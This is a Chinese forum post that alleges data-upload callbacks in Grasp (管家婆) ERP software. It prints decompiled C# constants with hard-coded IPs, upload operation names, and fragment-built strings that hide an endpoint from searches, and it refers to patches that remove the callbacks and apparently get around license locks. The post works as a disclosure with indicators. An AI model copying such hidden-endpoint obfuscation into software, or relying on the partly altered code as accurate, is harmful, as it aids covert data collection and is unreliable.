本帖最后由 ajm 于 2015-1-17 09:32 编辑
近期管家婆回传门爆发,受害群体猛增。还记得使用v3和a8过账时候的锁数据提示吧?
新版本回传提示。
明显的回传,有留意的朋友会发现安装iis的主机会有ip连接到上海、成都等地【下面会列出已知的所有回传ip】
旧版本回传提示
恢复前面的账套就又可以了,但是用一段时间又不行了,因为你联网了,回传都有个共同特点。厂家后台不会全部锁数据,他会抽取单据量大的客户来锁,意思是你单据量达到了多少 厂家就开始注意了。
下面列出所有回传ip
- 回传1
- 【upCustomerData2,上传客户的数据】
namespace CarpaServer.AC
{
    using System;

    /// <summary>
    /// Compile-time string constants from the decompiled CarpaServer.AC namespace.
    /// The surrounding post presents them as the configuration of the
    /// "upCustomerData2" upload. This class only declares the values; it contains
    /// no networking code of its own.
    /// </summary>
    /// <remarks>
    /// All members are <c>const</c>, so the compiler copies each literal into every
    /// assembly that references it. When auditing an installation, search all
    /// binaries for these strings rather than only the one declaring this class.
    /// </remarks>
    public sealed class Ac_Define
    {
        /// <summary>Hard-coded IPv4 address literal.</summary>
        // NOTE(review): presumably the host contacted for the upload; confirm against the caller.
        public const string wsh = "115.239.210.27";

        /// <summary>Hard-coded vendor host name.</summary>
        public const string graspUrl = "www.grasp.com.cn";

        /// <summary>Operation name string; the post describes it as "upload customer data".</summary>
        public const string uf = "upCustomerData2";

        /// <summary>
        /// 24-character string ending in "==", which is the shape of Base64 for 16 bytes.
        /// </summary>
        // NOTE(review): whether this is a key, a token or a checksum is not visible here.
        // Whatever its role, it is a fixed value shipped in the binary.
        public const string vs = "sbrsBPRj4OPwTQk2jKn2gw==";
    }
}
- 回传2
- 111.111.111.1 w3wp.exe 在每天第一次打开经营历程的时候会出现回滚条迟钝几秒,此ip正在这时同步发送。
- 回传3
- 【upCustomerInfo上传客户信息到最下面的ip】
- 在CarpaServer.Common,systemdefine
namespace CarpaServer.Common
{
    using System;

    /// <summary>
    /// Application-wide constants from the decompiled CarpaServer.Common namespace:
    /// version metadata, UI and paging limits, and a second set of hard-coded
    /// remote-endpoint values (the members whose names end in "Nx").
    /// </summary>
    /// <remarks>
    /// All fields are <c>const</c>, so their values are inlined into referencing
    /// assemblies at compile time. The same literals can therefore appear in other
    /// binaries of the product.
    /// </remarks>
    public sealed class SystemDefine
    {
        // ---- Version metadata ------------------------------------------------
        public const string SYSTEM_EDITION = "9.4";
        public const string SYSTEM_MEDITION = "";
        public const string SYSTEM_PUBDATE = "2014-09-25";
        public const string SYSTEM_VALIDNUMBER = "910";

        // ---- Hard-coded remote endpoint values -------------------------------
        // The post describes ufNx as the "upload customer info" operation sent to
        // wshNx. This class only declares the strings.
        // NOTE(review): how and where they are used must be confirmed in the calling code.
        public const string wshNx = "115.239.210.27";
        public const string ufNx = "upCustomerInfo";
        // Fixed opaque string shipped in the binary; its role is not visible here.
        public const string vsNx = "NxsBrsBPRj4OPwTQk2jKn2gwbwexeTxneu";
        public const string graspNxUrl = "www.grasp.com.cn";
        public const string baiduUrl = "www.baidu.com";

        // ---- Forum (BBS) related values --------------------------------------
        public const int BBS_ADD_EXP = 3;
        public const int BBS_REPLY_EXP = 1;
        public const string BBS_DIFF_TAG = "------------------!";

        // ---- UI, paging and limits -------------------------------------------
        // The decompiler printed three of these in hexadecimal; they are written in
        // decimal here and the values are unchanged.
        public const string cstWidth = "1000";
        public const int gridHeigh = 768;               // 0x300
        public const int gridWidth = 1010;              // 0x3f2
        public const int reportGridHeight = 460;
        public const int pagerNumericCount = 5;
        public const int DESKTOP_LIST_COUNT = 6;
        public const int sysInputCount = 30;
        public const int MaxDetailCount = 500;
        public const int MAXIDLESECOND = 180;
        public const int dbHelperCommandTimeOut = 2000; // 0x7d0; unit not shown here

        // ---- Miscellaneous ---------------------------------------------------
        public const string PosGuid = "e1899e3e-5cb3-4001-9478-84282a812d0b";

        /// <summary>
        /// Edition and publication date joined by a hyphen, with the date's hyphens
        /// replaced by dots. For the constants above this is "9.4-2014.09.25".
        /// </summary>
        public static string FULL_VERSION
        {
            get
            {
                string dottedDate = SYSTEM_PUBDATE.Replace('-', '.');
                return SYSTEM_EDITION + "-" + dottedDate;
            }
        }
    }
}
- 回传4
- 【间接调用数据库SysData.wsd,里面的ip进行触发回传】
namespace CarpaServer.Commission
{
    using CarpaServer;
    using System;

    /// <summary>
    /// Decompiled helper that assembles an address, an operation name, an opaque
    /// string and a web-service URL at run time from small fragments.
    /// </summary>
    /// <remarks>
    /// None of the assembled values exists as one contiguous literal in this class,
    /// so a plain string search of the binary for the full address, the full
    /// operation name or the full URL will not match here. Reviewers should search
    /// for the fragments or inspect the values at run time.
    /// All four fields are public, static and not read-only, so other code can
    /// reassign them after type initialisation.
    /// </remarks>
    public class Commission_AtpGsx
    {
        // Product name, then "9.4", a space, and "TOP". The IsNullOrEmpty test is
        // applied to the literal "910", so the "TOP" branch is always taken.
        public static string dtype = string.Format(
            "{0}9.4 {1}",
            AppUtils.productName,
            string.IsNullOrEmpty("910") ? string.Empty : "TOP");

        // Evaluates to "223.4.116.22". The decompiled original wrote the octets as
        // 0xdf, 4, 0x74 and 0x16.
        public static string gwsip = string.Join(".", new[]
        {
            Convert.ToString(223),
            Convert.ToString(4),
            Convert.ToString(116),
            Convert.ToString(22)
        });

        // Evaluates to "sbrsBPRj4OPwTQk2jKn2gw==", the same value the page shows as
        // Ac_Define.vs.
        // NOTE(review): the role of this string is not shown in this class.
        public static string mstr = string.Concat(new[]
        {
            "s", "br", "s", "BP", "Rj", "4", "OP", "wT", "Qk", "2j", "Kn2", "gw", "=", "="
        });

        // Evaluates to "upCustomerData2".
        public static string uf = string.Concat(new[]
        {
            "u", "p", "C", "ust", "ome", "rD", "ata", "2"
        });

        /// <summary>
        /// Returns true when <c>SysData.wsd</c> differs from "115.1.210.17", or when
        /// <c>gwsip</c> equals "2.239.210.27".
        /// </summary>
        /// <remarks>
        /// While <c>gwsip</c> holds its initial value "223.4.116.22", the second
        /// comparison is false and the result depends only on <c>SysData.wsd</c>.
        /// NOTE(review): what the two literal addresses stand for is not visible in
        /// this class; confirm against the callers.
        /// </remarks>
        public static bool isCompared()
        {
            if ("115.1.210.17" != SysData.wsd)
            {
                return true;
            }

            return "2.239.210.27" == gwsip;
        }

        /// <summary>
        /// Concatenates fixed fragments around <c>SysData.wsd</c>. The literal result
        /// is "ht1p://" + SysData.wsd + "/1raspWebServer/GWS.asmx".
        /// </summary>
        /// <remarks>
        /// NOTE(review): as written, the scheme "ht1p" and the path segment "1rasp..."
        /// are not a usable URL. Whether a caller rewrites the "1" characters before
        /// use is not visible here; verify before relying on this value as an indicator.
        /// </remarks>
        public static string rUrl()
        {
            object[] pieces =
            {
                "ht", "1p", ":", "/", "/", SysData.wsd,
                "/1", "rasp", "W", "ebSer", "ver/G", "W", "S", ".", "as", "mx"
            };
            return string.Concat(pieces);
        }

        /// <summary>Forwards to <c>AppUtils.uData()</c> and returns its result unchanged.</summary>
        public static string[] userData()
        {
            string[] forwarded = AppUtils.uData();
            return forwarded;
        }
    }
}
其他回传:
这些都是众所周知的
管家婆所有分销B、S系列数据库去回传sql语句.rar
送一个去数据库回传的执行语句。
回传实在可恶,看了这些,知道用分销的风险了吧,我观察 目前网上发布的补丁,99%都只去掉了表面上的125.69.76.115和www.grasp.com.cn 这2个地址【我的除外】,所以大家要小心选择补丁提供方。
然后大家觉得厂家是否该留后门,做一个讨论吧。